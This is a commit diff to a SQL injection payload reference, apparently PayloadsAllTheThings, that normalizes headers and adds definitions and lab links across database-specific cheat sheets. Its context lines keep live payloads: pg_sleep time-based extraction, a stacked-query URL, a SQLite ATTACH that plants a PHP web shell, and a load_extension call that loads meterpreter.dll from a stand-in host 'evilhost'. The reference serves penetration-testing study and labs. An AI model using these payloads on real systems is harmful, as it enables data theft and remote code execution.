Normalize page header for SQLi, Upload, Cache Deception

Author: swisskyrepo

SQL Injection/BigQuery Injection.md

@@ -1,4 +1,6 @@
-# Google BigQuery SQL Injection 
+# Google BigQuery SQL Injection
+
+> Google BigQuery SQL Injection  is a type of security vulnerability where an attacker can execute arbitrary SQL queries on a Google BigQuery database by manipulating user inputs that are incorporated into SQL queries without proper sanitization. This can lead to unauthorized data access, data manipulation, or other malicious activities.
 
 ## Summary
 
@@ -10,6 +12,7 @@
 * [BigQuery Time Based](#bigquery-time-based)
 * [References](#references)
 
+
 ## Detection
 
 * Use a classic single quote to trigger an error: `'`
@@ -62,6 +65,7 @@ dataset_name.column_name` union all select CAST(@@project_id AS INT64) ORDER BY
 
 * Time based functions does not exist in the BigQuery syntax.
 
+
 ## References
 
 * [BigQuery SQL Injection Cheat Sheet - Ozgur Alp - February 14, 2022](https://ozguralp.medium.com/bigquery-sql-injection-cheat-sheet-65ad70e11eac)

SQL Injection/DB2 Injection.md

@@ -2,6 +2,7 @@
 
 > IBM DB2 is a family of relational database management systems (RDBMS) developed by IBM. Originally created in the 1980s for mainframes, DB2 has evolved to support various platforms and workloads, including distributed systems, cloud environments, and hybrid deployments. 
 
+
 ## Summary
 
 * [DB2 Cheatsheet](#db2-cheatsheet)

SQL Injection/HQL Injection.md

@@ -2,6 +2,7 @@
 
 > Hibernate ORM (Hibernate in short) is an object-relational mapping tool for the Java programming language. It provides a framework for mapping an object-oriented domain model to a relational database. - Wikipedia
 
+
 ## Summary
 
 * [HQL Comments](#hql-comments)
@@ -15,7 +16,6 @@
 * [Methods by DBMS](#methods-by-dbms)
 * [References](#references)
 
-:warning: Your input will always be between the percentage symbols: `%INJECT_HERE%`
 
 ## HQL Comments
 

SQL Injection/MSSQL Injection.md

@@ -1,5 +1,8 @@
 # MSSQL Injection
 
+> MSSQL Injection  is a type of security vulnerability that can occur when an attacker can insert or "inject" malicious SQL code into a query executed by a Microsoft SQL Server (MSSQL) database. This typically happens when user inputs are directly included in SQL queries without proper sanitization or parameterization. SQL Injection can lead to serious consequences such as unauthorized data access, data manipulation, and even gaining control over the database server. 
+
+
 ## Summary
 
 * [MSSQL Default Databases](#mssql-default-databases)

SQL Injection/MySQL Injection.md

@@ -1,5 +1,8 @@
 # MySQL Injection
 
+> MySQL Injection  is a type of security vulnerability that occurs when an attacker is able to manipulate the SQL queries made to a MySQL database by injecting malicious input. This vulnerability is often the result of improperly handling user input, allowing attackers to execute arbitrary SQL code that can compromise the database's integrity and security.
+
+
 ## Summary
 
 * [MYSQL Default Databases](#mysql-default-databases)

SQL Injection/OracleSQL Injection.md

@@ -1,5 +1,8 @@
 # Oracle SQL Injection
 
+> Oracle SQL Injection  is a type of security vulnerability that arises when attackers can insert or "inject" malicious SQL code into SQL queries executed by Oracle Database. This can occur when user inputs are not properly sanitized or parameterized, allowing attackers to manipulate the query logic. This can lead to unauthorized access, data manipulation, and other severe security implications.
+
+
 ## Summary
 
 * [Oracle SQL Default Databases](#oracle-sql-default-databases)

SQL Injection/PostgreSQL Injection.md

@@ -1,48 +1,43 @@
-# PostgreSQL injection
+# PostgreSQL Injection
+
+> 
+
 
 ## Summary
 
 * [PostgreSQL Comments](#postgresql-comments)
-* [PostgreSQL version](#postgresql-version)
+* [PostgreSQL Version](#postgresql-version)
 * [PostgreSQL Current User](#postgresql-current-user)
 * [PostgreSQL List Users](#postgresql-list-users)
 * [PostgreSQL List Password Hashes](#postgresql-list-password-hashes)
 * [PostgreSQL List Database Administrator Accounts](#postgresql-list-database-administrator-accounts)
 * [PostgreSQL List Privileges](#postgresql-list-privileges)
 * [PostgreSQL Check if Current User is Superuser](#postgresql-check-if-current-user-is-superuser)
 * [PostgreSQL database name](#postgresql-database-name)
-* [PostgreSQL List databases](#postgresql-list-database)
-* [PostgreSQL List tables](#postgresql-list-tables)
-* [PostgreSQL List columns](#postgresql-list-columns)
+* [PoStgresql List Databases](#postgresql-list-database)
+* [PostgreSQL List Tables](#postgresql-list-tables)
+* [PostgreSQL List Columns](#postgresql-list-columns)
 * [PostgreSQL Error Based](#postgresql-error-based)
 * [PostgreSQL XML Helpers](#postgresql-xml-helpers)
 * [PostgreSQL Blind](#postgresql-blind)
 * [PostgreSQL Time Based](#postgresql-time-based)
-* [PostgreSQL Stacked query](#postgresql-stacked-query)
+* [PostgreSQL Stacked Query](#postgresql-stacked-query)
 * [PostgreSQL File Read](#postgresql-file-read)
 * [PostgreSQL File Write](#postgresql-file-write)
-* [PostgreSQL Command execution](#postgresql-command-execution)
+* [PostgreSQL Command Execution](#postgresql-command-execution)
     * [CVE-2019–9193](#cve-20199193)
     * [Using libc.so.6](#using-libcso6)
 * [Bypass Filter](#bypass-filter)
 * [References](#references)
 
+
 ## PostgreSQL Comments
 
 ```sql
 --
 /**/  
 ```
 
-## PostgreSQL chain injection points symbols
-```sql
-; #Used to terminate a SQL command. The only place it can be used within a statement is within a string constant or quoted identifier.
-|| #or statement 
-
-# usage examples: 
-/?whatever=1;(select 1 from pg_sleep(5))
-/?whatever=1||(select 1 from pg_sleep(5))
-```
 
 ## PostgreSQL Version
 
@@ -136,7 +131,7 @@ SELECT column_name FROM information_schema.columns WHERE table_name='data_table'
 ' and 1=cast((SELECT data_column FROM data_table LIMIT 1 OFFSET data_offset) as int) and '1'='1
 ```
 
-## PostgreSQL XML helpers
+## PostgreSQL XML Helpers
 
 ```sql
 select query_to_xml('select * from pg_user',true,true,''); -- returns all the results as a single xml row
@@ -151,6 +146,7 @@ select database_to_xmlschema(true,true,''); -- dump the current db to an XML sch
 
 Note, with the above queries, the output needs to be assembled in memory. For larger databases, this might cause a slow down or denial of service condition.
 
+
 ## PostgreSQL Blind
 
 ```sql
@@ -160,24 +156,28 @@ Note, with the above queries, the output needs to be assembled in memory. For la
 
 ## PostgreSQL Time Based
 
-#### Identify time based
+#### Identify Time Based
 
 ```sql
 select 1 from pg_sleep(5)
 ;(select 1 from pg_sleep(5))
 ||(select 1 from pg_sleep(5))
 ```
 
-#### Database dump time based
+#### Database Dump Time Based
+
 ```sql
 select case when substring(datname,1,1)='1' then pg_sleep(5) else pg_sleep(0) end from pg_database limit 1
 ```
 
-#### Table dump time based
+#### Table Dump Time Based
+
 ```sql
 select case when substring(table_name,1,1)='a' then pg_sleep(5) else pg_sleep(0) end from information_schema.tables limit 1
 ```
-#### columns dump time based
+
+#### Columns Dump Time Based
+
 ```sql
 select case when substring(column,1,1)='1' then pg_sleep(5) else pg_sleep(0) end from table_name limit 1
 select case when substring(column,1,1)='1' then pg_sleep(5) else pg_sleep(0) end from table_name where column_name='value' limit 1
@@ -191,12 +191,13 @@ AND [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000))
 
 ## PostgreSQL Stacked Query
 
-Use a semi-colon ";" to add another query
+Use a semi-colon "`;`" to add another query
 
 ```sql
 http://host/vuln.php?id=injection';create table NotSoSecure (data varchar(200));--
 ```
 
+
 ## PostgreSQL File Read
 
 ```sql
@@ -238,7 +239,7 @@ SELECT lo_put(43210, 20, 'some other data'); -- append data to a large object at
 SELECT lo_export(43210, '/tmp/testexport'); -- export data to /tmp/testexport
 ```
 
-## PostgreSQL Command execution
+## PostgreSQL Command Execution
 
 ### CVE-2019–9193
 

SQL Injection/README.md

@@ -1,13 +1,7 @@
 # SQL Injection
 
-> A SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the client to the application.
+> SQL Injection (SQLi)  is a type of security vulnerability that allows an attacker to interfere with the queries that an application makes to its database. SQL Injection is one of the most common and severe types of web application vulnerabilities, enabling attackers to execute arbitrary SQL code on the database. This can lead to unauthorized data access, data manipulation, and, in some cases, full compromise of the database server.
 
-Attempting to manipulate SQL queries may have goals including:
-
-- Information Leakage
-- Disclosure of stored data
-- Manipulation of stored data
-- Bypassing authorization controls
 
 ## Summary
 
@@ -21,7 +15,8 @@ Attempting to manipulate SQL queries may have goals including:
     * [HQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/HQL%20Injection.md)
     * [DB2 Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/DB2%20Injection.md)
     * [SQLmap](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/SQLmap%20Cheatsheet.md)
-* [Entry point detection](#entry-point-detection)
+* [Tools](#tools)
+* [Entry Point Detection](#entry-point-detection)
 * [DBMS Identification](#dbms-identification)
 * [Authentication bypass](#authentication-bypass)
     * [Authentication Bypass (Raw MD5 SHA1)](#authentication-bypass-raw-md5-sha1)
@@ -33,6 +28,8 @@ Attempting to manipulate SQL queries may have goals including:
     * [No Comma Allowed](#no-comma-allowed)
     * [No Equal Allowed](#no-equal-allowed)
     * [Case modification](#case-modification)
+* [Labs](#labs)
+* [References](#references)
 
 
 ## Tools
@@ -41,7 +38,7 @@ Attempting to manipulate SQL queries may have goals including:
 * [r0oth3x49/ghauri](https://github.com/r0oth3x49/ghauri) - An advanced cross-platform tool that automates the process of detecting and exploiting SQL injection security flaws
 
 
-## Entry point detection
+## Entry Point Detection
 
 Detecting the entry point in SQL injection (SQLi) involves identifying locations in an application where user input is not properly sanitized before it is included in SQL queries.
 
@@ -358,6 +355,19 @@ Bypass using LIKE/NOT IN/IN/BETWEEN
 * [PortSwigger - SQL injection vulnerability allowing login bypass](https://portswigger.net/web-security/sql-injection/lab-login-bypass)
 * [PortSwigger - SQL injection with filter bypass via XML encoding](https://portswigger.net/web-security/sql-injection/lab-sql-injection-with-filter-bypass-via-xml-encoding)
 * [PortSwigger - SQL Labs](https://portswigger.net/web-security/all-labs#sql-injection)
+* [Root Me - SQL injection - Authentication](https://www.root-me.org/en/Challenges/Web-Server/SQL-injection-authentication)
+* [Root Me - SQL injection - Authentication - GBK](https://www.root-me.org/en/Challenges/Web-Server/SQL-injection-authentication-GBK)
+* [Root Me - SQL injection - String](https://www.root-me.org/en/Challenges/Web-Server/SQL-injection-String)
+* [Root Me - SQL injection - Numeric](https://www.root-me.org/en/Challenges/Web-Server/SQL-injection-Numeric)
+* [Root Me - SQL injection - Routed](https://www.root-me.org/en/Challenges/Web-Server/SQL-Injection-Routed)
+* [Root Me - SQL injection - Error](https://www.root-me.org/en/Challenges/Web-Server/SQL-injection-Error)
+* [Root Me - SQL injection - Insert](https://www.root-me.org/en/Challenges/Web-Server/SQL-injection-Insert)
+* [Root Me - SQL injection - File reading](https://www.root-me.org/en/Challenges/Web-Server/SQL-injection-File-reading)
+* [Root Me - SQL injection - Time based](https://www.root-me.org/en/Challenges/Web-Server/SQL-injection-Time-based)
+* [Root Me - SQL injection - Blind](https://www.root-me.org/en/Challenges/Web-Server/SQL-injection-Blind)
+* [Root Me - SQL injection - Second Order](https://www.root-me.org/en/Challenges/Web-Server/SQL-Injection-Second-Order)
+* [Root Me - SQL injection - Filter bypass](https://www.root-me.org/en/Challenges/Web-Server/SQL-injection-Filter-bypass)
+* [Root Me - SQL Truncation](https://www.root-me.org/en/Challenges/Web-Server/SQL-Truncation)
 
 
 ## References

SQL Injection/SQLite Injection.md

@@ -1,37 +1,41 @@
 # SQLite Injection
 
+> SQLite Injection  is a type of security vulnerability that occurs when an attacker can insert or "inject" malicious SQL code into SQL queries executed by an SQLite database. This vulnerability arises when user inputs are integrated into SQL statements without proper sanitization or parameterization, allowing attackers to manipulate the query logic. Such injections can lead to unauthorized data access, data manipulation, and other severe security issues. 
+
+
 ## Summary
 
-* [SQLite comments](#sqlite-comments)
-* [SQLite version](#sqlite-version)
-* [String based - Extract database structure](#string-based---extract-database-structure)
-* [Integer/String based - Extract table name](#integerstring-based---extract-table-name)
-* [Integer/String based - Extract column name](#integerstring-based---extract-column-name)
-* [Boolean - Count number of tables](#boolean---count-number-of-tables)
-* [Boolean - Enumerating table name](#boolean---enumerating-table-name)
-* [Boolean - Extract info](#boolean---extract-info)
-* [Boolean - Error based](#boolean---error-based)
-* [Time based](#time-based)
+* [SQLite Comments](#sqlite-comments)
+* [SQLite Version](#sqlite-version)
+* [String Based - Extract Database Structure](#string-based---extract-database-structure)
+* [Integer/String Based - Extract Table Name](#integerstring-based---extract-table-name)
+* [Integer/String Based - Extract Column Name](#integerstring-based---extract-column-name)
+* [Boolean - Count Number Of Tables](#boolean---count-number-of-tables)
+* [Boolean - Enumerating Table Name](#boolean---enumerating-table-name)
+* [Boolean - Extract Info](#boolean---extract-info)
+* [Boolean - Error Based](#boolean---error-based)
+* [Time Based](#time-based)
 * [Remote Code Execution](#remote-code-execution)
     * [Attach Database](#attach-database)
     * [Load_extension](#load_extension)
 * [References](#references)
 
 
-## SQLite comments
+## SQLite Comments
 
 ```sql
 --
 /**/
 ```
 
-## SQLite version
+## SQLite Version
 
 ```sql
 select sqlite_version();
 ```
 
-## String based - Extract database structure
+
+## String Based - Extract Database Structure
 
 ```sql
 SELECT sql FROM sqlite_schema
@@ -40,13 +44,16 @@ if sqlite_version > 3.33.0
 ```sql
 SELECT sql FROM sqlite_master
 ```
-## Integer/String based - Extract table name
+
+
+## Integer/String Based - Extract Table Name
 
 ```sql
 SELECT group_concat(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%'
 ```
 
-## Integer/String based - Extract column name
+
+## Integer/String Based - Extract Column Name
 
 ```sql
 SELECT sql FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name ='table_name'
@@ -64,37 +71,38 @@ Cleaner output
 SELECT GROUP_CONCAT(name) AS column_names FROM pragma_table_info('table_name');
 ```
 
-## Boolean - Count number of tables
+
+## Boolean - Count Number Of Tables
 
 ```sql
 and (SELECT count(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%' ) < number_of_table
 ```
 
-## Boolean - Enumerating table name
+## Boolean - Enumerating Table Name
 
 ```sql
 and (SELECT length(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name not like 'sqlite_%' limit 1 offset 0)=table_name_length_number
 ```
 
-## Boolean - Extract info
+## Boolean - Extract Info
 
 ```sql
 and (SELECT hex(substr(tbl_name,1,1)) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%' limit 1 offset 0) > hex('some_char')
 ```
 
-## Boolean - Extract info (order by)
+### Boolean - Extract Info (order by)
 
 ```sql
 CASE WHEN (SELECT hex(substr(sql,1,1)) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%' limit 1 offset 0) = hex('some_char') THEN <order_element_1> ELSE <order_element_2> END
 ```
 
-## Boolean - Error based
+## Boolean - Error Based
 
 ```sql
 AND CASE WHEN [BOOLEAN_QUERY] THEN 1 ELSE load_extension(1) END
 ```
 
-## Time based
+## Time Based
 
 ```sql
 AND [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))
@@ -117,7 +125,7 @@ INSERT INTO lol.pwn (dataz) VALUES ("<?php system($_GET['cmd']); ?>");--
 UNION SELECT 1,load_extension('\\evilhost\evilshare\meterpreter.dll','DllMain');--
 ```
 
-Note: By default this component is disabled
+Note: By default this component is disabled.
 
 
 ## References